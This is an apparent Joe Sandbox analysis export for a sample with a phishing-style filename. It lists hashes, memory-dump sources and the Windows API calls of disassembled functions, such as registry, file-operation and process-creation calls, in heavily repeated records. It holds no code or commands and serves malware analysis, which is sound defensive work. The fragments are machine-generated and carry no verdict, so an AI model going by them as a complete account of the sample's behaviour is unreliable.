                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
                            • Instruction ID: 0eb50412ba17cbd686f9e43e0b7d85c943a315db4d9133bb66c32ce13943f697
                            • Opcode Fuzzy Hash: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
                            • Instruction Fuzzy Hash: E7813471E04229DBDF24CFA9C8447ADBBB0FB44305F24816ED856BB281C7786A86DF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
                            • Instruction ID: 6da958b06032b63f13a44664be3ec753dd66a0d9f0ebc92e4dfa00afb32c2233
                            • Opcode Fuzzy Hash: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
                            • Instruction Fuzzy Hash: 677123B1D04229CBDF24CFA8C8847ADBBF1FB44305F14816AE856B7281D7386A86DF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
                            • Instruction ID: e79abdf9917e1b0942e39fca47e1ede282e873968176da0823b4a4e8bca0445d
                            • Opcode Fuzzy Hash: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
                            • Instruction Fuzzy Hash: 0A712371E04229CBDB28CF98C884BADBBB1FB44305F14816EE856B7291C7786986DF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
                            • Instruction ID: 82756e30bcf828709d5cbcfbd5bc5585b8b9ec353a8eaca6552b8bf5b5cc12a5
                            • Opcode Fuzzy Hash: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
                            • Instruction Fuzzy Hash: 70713371E04229CBDF28CF98C844BADBBB1FB44305F14816EE856B7291C7786A86DF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00402103
                              • Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                              • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                              • Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED), ref: 004055C4
                              • Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                              • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                            • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                            • String ID:
                            • API String ID: 334405425-0
                            • Opcode ID: eb63b2b6e338388614513e0d23c9cea74ee8085ea90cd044aa1dbd5ff4645262
                            • Instruction ID: 94cae06f4fc191ca30d479cf411a95ccd627b95a6d871bbe988cbf7c6203fea7
                            • Opcode Fuzzy Hash: eb63b2b6e338388614513e0d23c9cea74ee8085ea90cd044aa1dbd5ff4645262
                            • Instruction Fuzzy Hash: 0D21F231904104FBCF11AFA5CF48A9E7A71BF48354F20013BF501B91E0DBBD8A92965D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 0040683D: FindFirstFileW.KERNELBASE(74DF3420,00426758,00425F10,00405F27,00425F10,00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00406848
                              • Part of subcall function 0040683D: FindClose.KERNELBASE(00000000), ref: 00406854
                            • lstrlenW.KERNEL32 ref: 0040233F
                            • lstrlenW.KERNEL32(00000000), ref: 0040234A
                            • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402373
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: FileFindlstrlen$CloseFirstOperation
                            • String ID:
                            • API String ID: 1486964399-0
                            • Opcode ID: 729a783eca27f554c611e4ba6000d1fcbab3e5c8ea7f73232362adceb173aaa0
                            • Instruction ID: 9b7d4dbee212afcf38129da4f7c322c85c69d028675fd491911c32071dce19bd
                            • Opcode Fuzzy Hash: 729a783eca27f554c611e4ba6000d1fcbab3e5c8ea7f73232362adceb173aaa0
                            • Instruction Fuzzy Hash: D3117C71900318AADB10EFB9D949A9EB6F8BF04348F10453FE405FB2D1E6B8C9408B59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                            • RegEnumValueW.KERNELBASE(00000000,00000000,?,?), ref: 004025E4
                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nso1577.tmp,00000000,00000011,00000002), ref: 004025FD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: Enum$CloseValue
                            • String ID:
                            • API String ID: 397863658-0
                            • Opcode ID: 9fccfe95b1a4bed92a5e2a1a1a6cbc94f9087b61eba1d613987d6439c8e41530
                            • Instruction ID: 8c40f98af4add78d59c4bc2bb7842a1dfdaddd4ec6c9bbdee1c196b88a33675a
                            • Opcode Fuzzy Hash: 9fccfe95b1a4bed92a5e2a1a1a6cbc94f9087b61eba1d613987d6439c8e41530
                            • Instruction Fuzzy Hash: 61017CB1A04105BBEB159F94DE58AAFB66CEF40348F10403AF501B61D0EBB85E45966D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
                              • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
                              • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                              • Part of subcall function 00405A38: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
                            • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                            • String ID:
                            • API String ID: 1892508949-0
                            • Opcode ID: 8f57ab04ce479e6f384afb71daf5a0ad1c889930ae6c694706ac65ac793ee6d7
                            • Instruction ID: 5432bfb841e0ad51ec8b230ce72dc3ef5087fba7ddd62730da8486a2a7133ac3
                            • Opcode Fuzzy Hash: 8f57ab04ce479e6f384afb71daf5a0ad1c889930ae6c694706ac65ac793ee6d7
                            • Instruction Fuzzy Hash: 0F110331504100EBCF216FA0CD40A9F36A0EF14328B24093BF941B12F1DA3E4A829B8D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nso1577.tmp,00000000,00000011,00000002), ref: 004025FD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: CloseQueryValue
                            • String ID:
                            • API String ID: 3356406503-0
                            • Opcode ID: 940ed37a66827729c038e1b8cd76da8b0d573cfd7dc5a63c64a49e01cddd29a3
                            • Instruction ID: f1f7847c69b95e8b88bdf62be751073741875666d26e4aee14b76084b72d5d95
                            • Opcode Fuzzy Hash: 940ed37a66827729c038e1b8cd76da8b0d573cfd7dc5a63c64a49e01cddd29a3
                            • Instruction Fuzzy Hash: E2116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID:
                            • API String ID: 3850602802-0
                            • Opcode ID: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
                            • Instruction ID: 40daf909c284af41af5c9cdf7f458e0296b91398e9c9917f7ae767538e8fd086
                            • Opcode Fuzzy Hash: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
                            • Instruction Fuzzy Hash: 1A01D131724220EBEB194B389D09B2A3698E710318F10867AF855F66F1E6788C129B5C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
                            • RegCloseKey.ADVAPI32(00000000), ref: 0040245F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: CloseDeleteValue
                            • String ID:
                            • API String ID: 2831762973-0
                            • Opcode ID: 539ae3188a4c4aacacdcf38499ab856935469f4ad7a000a5955107d7b9fcad77
                            • Instruction ID: 3efe7552218bc8638c386b206662a839c6be39db124f2854c1ef7ee844e7f5c6
                            • Opcode Fuzzy Hash: 539ae3188a4c4aacacdcf38499ab856935469f4ad7a000a5955107d7b9fcad77
                            • Instruction Fuzzy Hash: 39F0C232A00120EBDB11ABB89B4DAAD72A8AF44314F15443BE141B71C0DAFC4D01866E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                            • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: Window$EnableShow
                            • String ID:
                            • API String ID: 1136574915-0
                            • Opcode ID: 07387bb625850943ad519744cb716489a10abda1bd00eedec3e0b61719a5cb9c
                            • Instruction ID: 5d3c5223d4adea09edd48fe2ddafa99b3fbee87e2958761c9001e4fb32d1ad87
                            • Opcode Fuzzy Hash: 07387bb625850943ad519744cb716489a10abda1bd00eedec3e0b61719a5cb9c
                            • Instruction Fuzzy Hash: C3E0D872908201CFE705EBA4EE485AE73F4EF40315710097FE401F11D1DBB54C00866D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,00000000,00000000), ref: 00405B13
                            • CloseHandle.KERNEL32(?), ref: 00405B20
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: CloseCreateHandleProcess
                            • String ID:
                            • API String ID: 3712363035-0
                            • Opcode ID: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                            • Instruction ID: 90cc6d476167cb297d6b140a5f1e3d8b94c2ff7c6bb70ea469832da4d223c92c
                            • Opcode Fuzzy Hash: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                            • Instruction Fuzzy Hash: F2E0BFB46002097FEB109B64ED45F7B77BCEB04608F414465BD54F6150DB74A9158E7C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: ShowWindow
                            • String ID:
                            • API String ID: 1268545403-0
                            • Opcode ID: 2e7e2aa4d72de09270b3b6845aff41f38ae00b54f46d65ff2e3fa17b0a003936
